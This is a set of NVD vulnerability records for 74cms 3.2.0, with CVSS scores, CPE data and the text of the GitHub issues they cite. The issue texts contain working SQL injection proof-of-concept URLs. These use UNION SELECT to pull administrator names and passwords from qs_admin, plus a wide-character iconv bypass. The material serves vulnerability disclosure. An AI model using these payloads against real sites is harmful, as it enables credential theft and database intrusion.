[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "EE13452F-D4FF-47A1-9821-61F4655EE220", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/blindkey/cve_like/issues/10
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "blindkey", "cve_like" ]
upload/plus/ajax_street.php ![image](https://user-images.githubusercontent.com/703783/74736538-f905e180-528d-11ea-9bf6-a797f3df3935.png) $alphabet=trim($_GET['x']); and then $alphabet has been pass to sql without filter so leads to sql inject poc like : `/plus/ajax_street.php?act=alphabet&x=11�' union select 1,2,3,concat(0x3C2F613E20),5,6,7,concat(0x4E56535F544553542D2D,admin_name,0x3A,pwd,0x2D2D4E56535F54455354),9 from qs_admin#`
74cms 3.2.0 plus/ajax_street.php x SQLinject
https://api.github.com/repos/blindkey/cve_like/issues/10/comments
0
2020-02-18T12:35:38Z
2020-02-18T12:35:38Z
https://github.com/blindkey/cve_like/issues/10
566,863,623
10
2,070
CVE-2020-22209
2021-06-16T18:15:07.800
SQL Injection in 74cms 3.2.0 via the query parameter to plus/ajax_common.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/blindkey/cve_like/issues/12" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/blindkey/cve_like/issues/12" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "EE13452F-D4FF-47A1-9821-61F4655EE220", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/blindkey/cve_like/issues/12
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "blindkey", "cve_like" ]
plus/ajax_common.php ![image](https://user-images.githubusercontent.com/703783/74736998-e4761900-528e-11ea-87c7-1379d83078c4.png) $_GET['query'] pass to $gbk_query and then $gbk_query get iconv so use some special word to do something with iconv ,like wide charactars( such as %8c%27 ) chinese word or some thing . and then get into sql and finally leads to sql inject . poc: ` upload/plus/ajax_common.php?act=hotword&query=aa%錦%27%20union%20select%201,concat(version(),user()),3%23%27`
74cms 3.2.0 ajax_common query SQL inject
https://api.github.com/repos/blindkey/cve_like/issues/12/comments
0
2020-02-18T12:44:54Z
2020-02-18T12:44:54Z
https://github.com/blindkey/cve_like/issues/12
566,868,513
12
2,071
CVE-2020-22210
2021-06-16T18:15:07.830
SQL Injection in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/blindkey/cve_like/issues/11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/blindkey/cve_like/issues/11" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "EE13452F-D4FF-47A1-9821-61F4655EE220", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/blindkey/cve_like/issues/11
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "blindkey", "cve_like" ]
upload/plus/ajax_officebuilding.php ![image](https://user-images.githubusercontent.com/703783/74736735-5a2db500-528e-11ea-95d7-d4ad5065aed4.png) exactly the same as what happend to ajax_street.php x pass to alphabet and get in within a sql expression without filter ,so leads to sql inject poc the same : `/plus/ajax_officebuilding.php?act=alphabet&x=11�' union select 1,2,3,concat(0x3C2F613E20),5,6,7,concat(0x4E56535F544553542D2D,admin_name,0x3A,pwd,0x2D2D4E56535F54455354),9 from qs_admin#`
74cms 3.2.0 ajax_officebuilding.php x SQL inject
https://api.github.com/repos/blindkey/cve_like/issues/11/comments
0
2020-02-18T12:38:29Z
2020-02-18T12:38:29Z
https://github.com/blindkey/cve_like/issues/11
566,865,058
11
2,072